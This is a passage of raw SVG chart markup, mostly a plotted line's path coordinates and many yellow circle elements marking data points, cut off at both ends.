221.77502934400002 L 130.73851102941177 221.598210784 L 132.26654411764707 221.44181425066625 L 133.79457720588235 221.44181425066625 L 135.32261029411765 221.36100625066626 L 136.85064338235296 221.36100625066626 L 138.37867647058823 221.36100625066626 L 139.90670955882354 221.36100625066626 L 141.43474264705884 221.36100625066626 L 142.96277573529412 221.36100625066626 L 144.49080882352942 221.36100625066626 L 146.01884191176472 221.36100625066626 L 147.546875 221.36100625066626 L 149.0749080882353 221.36100625066626 L 150.6029411764706 221.36100625066626 L 152.13097426470588 218.66954929066628 L 153.6590073529412 217.97563057066628 L 155.18704044117646 217.97563057066628 L 156.71507352941177 214.99860465066627 L 158.24310661764707 209.52447537066627 L 159.77113970588235 209.52447537066627 L 161.29917279411765 209.52447537066627 L 162.82720588235296 209.52447537066627 L 164.35523897058823 209.52447537066627 L 165.88327205882354 209.52447537066627 L 167.41130514705884 209.52447537066627 L 168.93933823529412 209.52447537066627 L 170.46737132352942 206.15682417066625 L 171.99540441176472 206.15682417066625 L 173.5234375 206.15682417066625 L 175.0514705882353 206.15682417066625 L 176.5795036764706 206.15682417066625 L 178.10753676470588 204.93529137066628 L 179.6355698529412 204.93529137066628 L 181.1636029411765 204.93529137066628 L 182.69163602941177 204.93529137066628 L 184.21966911764707 204.93529137066628 L 185.74770220588235 204.93529137066628 L 187.27573529411765 199.23997905066625 L 188.80376838235296 190.51914417066627 L 190.33180147058823 181.13458257066625 L 191.85983455882354 177.58471377066627 L 193.38786764705884 177.58471377066627 L 194.91590073529412 171.20709777066625 L 196.44393382352942 171.20709777066625 L 197.97196691176472 171.20709777066625 L 199.5 171.20709777066625 L 201.0280330882353 171.20709777066625 L 202.5560661764706 171.20709777066625 L 204.08409926470588 171.20709777066625 L 205.6121323529412 171.20709777066625 L 207.1401654411765 171.20709777066625 L 208.66819852941177 171.20709777066625 L 210.19623161764707 171.20709777066625 L 211.72426470588235 170.8553195306663 L 213.25229779411765 170.8553195306663 L 214.78033088235296 170.8553195306663 L 216.30836397058823 170.8553195306663 L 217.83639705882354 170.8553195306663 L 219.36443014705884 170.8553195306663 L 220.89246323529412 170.8553195306663 L 222.42049632352942 170.8553195306663 L 223.94852941176472 170.8553195306663 L 225.4765625 170.8553195306663 L 227.0045955882353 170.8553195306663 L 228.5326286764706 170.8553195306663 L 230.06066176470588 170.8553195306663 L 231.5886948529412 170.8553195306663 L 233.1167279411765 170.8553195306663 L 234.64476102941177 170.8553195306663 L 236.17279411764707 169.9668932906663 L 237.70082720588238 169.9668932906663 L 239.22886029411765 169.9668932906663 L 240.75689338235296 169.9668932906663 L 242.28492647058823 169.9668932906663 L 243.81295955882354 169.9668932906663 L 245.34099264705884 169.9668932906663 L 246.86902573529412 169.9668932906663 L 248.39705882352942 169.9668932906663 L 249.92509191176472 169.9668932906663 L 251.453125 169.9668932906663 L 252.9811580882353 169.9668932906663 L 254.5091911764706 169.9668932906663 L 256.0372242647059 169.9668932906663 L 257.56525735294116 169.9668932906663 L 259.09329044117646 169.9668932906663 L 260.62132352941177 169.9668932906663 L 262.1493566176471 169.9668932906663 L 263.6773897058824 169.9668932906663 L 265.2054227941177 169.93208369066627 L 266.7334558823529 169.93208369066627 L 268.26148897058823 169.93208369066627 L 269.78952205882354 169.93208369066627 L 271.31755514705884 169.93208369066627 L 272.84558823529414 169.93208369066627 L 274.37362132352945 169.93208369066627 L 275.9016544117647 169.93208369066627 L 277.4296875 169.93208369066627 L 278.9577205882353 169.93208369066627 L 280.4857536764706 169.93208369066627 L 282.0137867647059 169.93208369066627 L 283.54181985294116 169.93208369066627 L 285.06985294117646 169.93208369066627 L 286.59788602941177 169.93208369066627 L 288.1259191176471 169.93208369066627 L 289.6539522058824 169.93208369066627 L 291.1819852941177 169.93208369066627 L 292.7100183823529 169.93208369066627 L 294.23805147058823 169.93208369066627 L 295.76608455882354 169.93208369066627 L 297.29411764705884 169.93208369066627 L 298.82215073529414 169.93208369066627 L 300.35018382352945 169.93208369066627 L 301.8782169117647 169.93208369066627 L 303.40625 163.11984497066626 L 304.9342830882353 151.89524081066628 L 306.4623161764706 151.89524081066628 L 307.9903492647059 151.89524081066628 L 309.51838235294116 151.89524081066628 L 311.04641544117646 151.89524081066628 L 312.57444852941177 151.89524081066628 L 314.1024816176471 151.89524081066628 L 315.6305147058824 143.18861393066626 L 317.1585477941177 143.18861393066626 L 318.6865808823529 143.18861393066626 L 320.21461397058823 143.18861393066626 L 321.74264705882354 143.18861393066626 L 323.27068014705884 123.14467793066623 L 324.79871323529414 123.14467793066623 L 326.32674632352945 123.14467793066623 L 327.8547794117647 123.14467793066623 L 329.3828125 123.14467793066623 L 330.9108455882353 123.14467793066623 L 332.4388786764706 123.14467793066623 L 333.9669117647059 123.14467793066623 L 335.4949448529412 123.14467793066623 L 337.02297794117646 119.25736913066623 L 338.55101102941177 117.28132049066622 L 340.0790441176471 112.22174513066622 L 341.6070772058824 82.9090072106662 L 343.1351102941177 82.9090072106662 L 344.6631433823529 82.9090072106662 L 346.19117647058823 82.9090072106662 L 347.71920955882354 82.9090072106662 L 349.24724264705884 82.9090072106662 L 350.77527573529414 82.9090072106662 L 352.30330882352945 82.9090072106662 L 353.8313419117647 82.9090072106662 L 355.359375 82.9090072106662 L 356.8874080882353 77.08884209066622 L 358.4154411764706 77.08884209066622 L 359.9434742647059 77.08884209066622 L 361.4715073529412 77.08884209066622 L 362.99954044117646 77.08884209066622 L 364.52757352941177 77.08884209066622 L 366.0556066176471 77.08884209066622 L 367.5836397058824 77.08884209066622 L 369.1116727941177 77.08884209066622 L 370.6397058823529 77.08884209066622 L 372.16773897058823 63.71002097066622 L 373.69577205882354 63.71002097066622 L 375.22380514705884 63.29585777066623 L 376.75183823529414 63.29585777066623 L 378.27987132352945 63.29585777066623 L 379.8079044117647 63.29585777066623 L 381.3359375 46.582454570666215 L 382.8639705882353 36.586806890666196 L 384.3920036764706 35.76075377066621 L 385.9200367647059 35.252202090666174 L 387.4480698529412 34.45044465066621 L 388.97610294117646 34.45044465066621 L 390.50413602941177 34.45044465066621 L 392.0321691176471 28.75783185066615 L 393.5602022058824 24.76119249066619 L 395.0882352941177 24.76119249066619" fill="none" stroke="#DDDF0D" stroke-width="2"></path><circle cx="395.0882352941177" cy="24.76119249066619" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="393.5602022058824" cy="24.76119249066619" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="392.0321691176471" cy="28.75783185066615" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="390.50413602941177" cy="34.45044465066621" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="388.97610294117646" cy="34.45044465066621" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="387.4480698529412" cy="34.45044465066621" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="385.9200367647059" cy="35.252202090666174" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="384.3920036764706" cy="35.76075377066621" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="382.8639705882353" cy="36.586806890666196" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="381.3359375" cy="46.582454570666215" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="379.8079044117647" cy="63.29585777066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="378.27987132352945" cy="63.29585777066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="376.75183823529414" cy="63.29585777066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="375.22380514705884" cy="63.29585777066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="373.69577205882354" cy="63.71002097066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="372.16773897058823" cy="63.71002097066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="370.6397058823529" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="369.1116727941177" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="367.5836397058824" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="366.0556066176471" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="364.52757352941177" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="362.99954044117646" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="361.4715073529412" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="359.9434742647059" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="358.4154411764706" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="356.8874080882353" cy="77.08884209066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="355.359375" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="353.8313419117647" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="352.30330882352945" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="350.77527573529414" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="349.24724264705884" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="347.71920955882354" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="346.19117647058823" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="344.6631433823529" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="343.1351102941177" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="341.6070772058824" cy="82.9090072106662" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="340.0790441176471" cy="112.22174513066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="338.55101102941177" cy="117.28132049066622" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="337.02297794117646" cy="119.25736913066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="335.4949448529412" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="333.9669117647059" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="332.4388786764706" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="330.9108455882353" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="329.3828125" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="327.8547794117647" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="326.32674632352945" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="324.79871323529414" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="323.27068014705884" cy="123.14467793066623" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="321.74264705882354" cy="143.18861393066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="320.21461397058823" cy="143.18861393066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="318.6865808823529" cy="143.18861393066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="317.1585477941177" cy="143.18861393066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="315.6305147058824" cy="143.18861393066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="314.1024816176471" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="312.57444852941177" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="311.04641544117646" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="309.51838235294116" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="307.9903492647059" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="306.4623161764706" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="304.9342830882353" cy="151.89524081066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="303.40625" cy="163.11984497066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="301.8782169117647" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="300.35018382352945" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="298.82215073529414" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="297.29411764705884" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="295.76608455882354" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="294.23805147058823" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="292.7100183823529" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="291.1819852941177" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="289.6539522058824" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="288.1259191176471" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="286.59788602941177" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="285.06985294117646" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="283.54181985294116" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="282.0137867647059" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="280.4857536764706" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="278.9577205882353" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="277.4296875" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="275.9016544117647" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="274.37362132352945" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="272.84558823529414" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="271.31755514705884" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="269.78952205882354" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="268.26148897058823" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="266.7334558823529" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="265.2054227941177" cy="169.93208369066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="263.6773897058824" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="262.1493566176471" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="260.62132352941177" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="259.09329044117646" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="257.56525735294116" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="256.0372242647059" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="254.5091911764706" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="252.9811580882353" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="251.453125" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="249.92509191176472" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="248.39705882352942" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="246.86902573529412" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="245.34099264705884" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="243.81295955882354" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="242.28492647058823" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="240.75689338235296" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="239.22886029411765" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="237.70082720588238" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="236.17279411764707" cy="169.9668932906663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="234.64476102941177" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="233.1167279411765" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="231.5886948529412" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="230.06066176470588" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="228.5326286764706" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="227.0045955882353" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="225.4765625" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="223.94852941176472" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="222.42049632352942" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="220.89246323529412" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="219.36443014705884" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="217.83639705882354" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="216.30836397058823" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="214.78033088235296" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="213.25229779411765" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="211.72426470588235" cy="170.8553195306663" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="210.19623161764707" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="208.66819852941177" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="207.1401654411765" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="205.6121323529412" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="204.08409926470588" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="202.5560661764706" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="201.0280330882353" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="199.5" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="197.97196691176472" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="196.44393382352942" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="194.91590073529412" cy="171.20709777066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="193.38786764705884" cy="177.58471377066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="191.85983455882354" cy="177.58471377066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="190.33180147058823" cy="181.13458257066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="188.80376838235296" cy="190.51914417066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="187.27573529411765" cy="199.23997905066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="185.74770220588235" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="184.21966911764707" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="182.69163602941177" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="181.1636029411765" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="179.6355698529412" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="178.10753676470588" cy="204.93529137066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="176.5795036764706" cy="206.15682417066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="175.0514705882353" cy="206.15682417066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="173.5234375" cy="206.15682417066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="171.99540441176472" cy="206.15682417066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="170.46737132352942" cy="206.15682417066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="168.93933823529412" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="167.41130514705884" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="165.88327205882354" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="164.35523897058823" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="162.82720588235296" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="161.29917279411765" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="159.77113970588235" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="158.24310661764707" cy="209.52447537066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="156.71507352941177" cy="214.99860465066627" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="155.18704044117646" cy="217.97563057066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="153.6590073529412" cy="217.97563057066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="152.13097426470588" cy="218.66954929066628" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="150.6029411764706" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="149.0749080882353" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="147.546875" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="146.01884191176472" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="144.49080882352942" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="142.96277573529412" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="141.43474264705884" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="139.90670955882354" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="138.37867647058823" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="136.85064338235296" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="135.32261029411765" cy="221.36100625066626" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="133.79457720588235" cy="221.44181425066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="132.26654411764707" cy="221.44181425066625" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="130.73851102941177" cy="221.598210784" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="129.21047794117646" cy="221.77502934400002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="127.68244485294119" cy="221.77502934400002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="126.15441176470588" cy="221.77502934400002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="124.6263786764706" cy="221.77502934400002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="123.0983455882353" cy="221.77502934400002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="121.5703125" cy="221.854146592" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="120.04227941176471" cy="221.854146592" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="118.51424632352942" cy="221.94209056" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="116.98621323529413" cy="221.94209056" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="115.45818014705883" cy="222.473896" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="113.93014705882354" cy="223.09276096000002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="112.40211397058825" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="110.87408088235294" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="109.34604779411765" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="107.81801470588236" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="106.28998161764706" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="104.76194852941177" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="103.23391544117648" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="101.70588235294119" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="100.17784926470588" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="98.6498161764706" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="97.1217830882353" cy="223.70690176" 